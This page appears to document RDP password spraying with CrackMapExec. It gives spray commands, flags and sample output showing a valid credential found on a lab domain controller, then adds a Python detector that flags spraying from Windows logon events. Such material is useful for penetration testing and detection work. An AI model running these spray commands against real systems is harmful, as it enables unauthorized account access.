Password spraying
RDP password spraying using CrackMapExec

Password spraying

```
#~ poetry run crackmapexec rdp 192.168.1.0/24 -u user -p password
```

```
$ poetry run crackmapexec rdp 192.168.133.157 -u ron -p October2021
RDP 192.168.133.157 3389 DC01 [*] Windows 10 or Windows Server 2016 Build 17763 (name:DC01) (domain:poudlard.wizard)
RDP 192.168.133.157 3389 DC01 [-] poudlard.wizard\ron:October2021

$ poetry run crackmapexec rdp 192.168.133.157 -u rubeus -p October2021
RDP 192.168.133.157 3389 DC01 [*] Windows 10 or Windows Server 2016 Build 17763 (name:DC01) (domain:poudlard.wizard)
RDP 192.168.133.157 3389 DC01 [+] poudlard.wizard\rubeus:October2021 (Pwn3d!)
```

Password spraying (without bruteforce)

```
#~ poetry run crackmapexec rdp 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforce
```

Expected Results:

```
└─$ poetry run crackmapexec rdp 192.168.133.157 -u /tmp/users -p passwordfile --no-bruteforce
RDP 192.168.133.157 3389 DC01 [*] Windows 10 or Windows Server 2016 Build 17763 (name:DC01) (domain:poudlard.wizard)
RDP 192.168.133.157 3389 DC01 [-] poudlard.wizard\ron:toto
RDP 192.168.133.157 3389 DC01 [-] poudlard.wizard\demo:tata
RDP 192.168.133.157 3389 DC01 [+] poudlard.wizard\rubeus:October2021 (Pwn3d!)
```
By default, CME exits after a successful login is found. With the --continue-on-success flag, it keeps spraying even after a valid password is found. This is useful for spraying a single password against a large user list.
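From the defender's side, the spraying shown above leaves a recognizable trace: one source failing logons against several distinct accounts in a short window, sometimes followed by a success. The detection sketch below is an added example, not part of CrackMapExec or the original page; the event tuples, source addresses, timestamps, the account `hagrid` and the thresholds are constructed assumptions (4625 and 4624 are the Windows Security log IDs for failed and successful logons).

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records: (timestamp, source IP, target account, event ID).
# 4625 = failed logon, 4624 = successful logon (Windows Security log).
EVENTS = [
    ("2021-10-05T09:00:01", "192.168.133.50", "ron", 4625),
    ("2021-10-05T09:00:02", "192.168.133.50", "demo", 4625),
    ("2021-10-05T09:00:03", "192.168.133.50", "hagrid", 4625),
    ("2021-10-05T09:00:04", "192.168.133.50", "rubeus", 4624),
    # A user mistyping their own password: many failures, one account.
    ("2021-10-05T09:10:00", "192.168.133.77", "ron", 4625),
    ("2021-10-05T09:10:20", "192.168.133.77", "ron", 4625),
    ("2021-10-05T09:10:40", "192.168.133.77", "ron", 4625),
    ("2021-10-05T09:11:00", "192.168.133.77", "ron", 4624),
]

def detect_spray(events, window=timedelta(minutes=5), min_accounts=3):
    """Flag sources whose failed logons hit >= min_accounts distinct accounts
    inside a sliding window. Returns {source: {"failed": [...], "succeeded": [...]}}."""
    by_src = defaultdict(list)
    for ts, src, user, eid in events:
        by_src[src].append((datetime.fromisoformat(ts), user.lower(), eid))
    alerts = {}
    for src, rows in by_src.items():
        rows.sort()
        fails = [(t, u) for t, u, e in rows if e == 4625]
        start = 0
        for end in range(len(fails)):
            # Shrink the window until it spans at most `window` of time.
            while fails[end][0] - fails[start][0] > window:
                start += 1
            accounts = {u for _, u in fails[start:end + 1]}
            if len(accounts) >= min_accounts:
                t0, t1 = fails[start][0], fails[end][0] + window
                # A success from the same source around the burst is the
                # account to reset first.
                hits = {u for t, u, e in rows if e == 4624 and t0 <= t <= t1}
                entry = alerts.setdefault(src, {"failed": set(), "succeeded": set()})
                entry["failed"] |= accounts
                entry["succeeded"] |= hits
    return {s: {k: sorted(v) for k, v in a.items()} for s, a in alerts.items()}

if __name__ == "__main__":
    print(detect_spray(EVENTS))
```

Counting distinct accounts per source, rather than total failures, is what separates a spray from a single user repeatedly mistyping a password, which stays below any per-account lockout threshold in the same way.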
​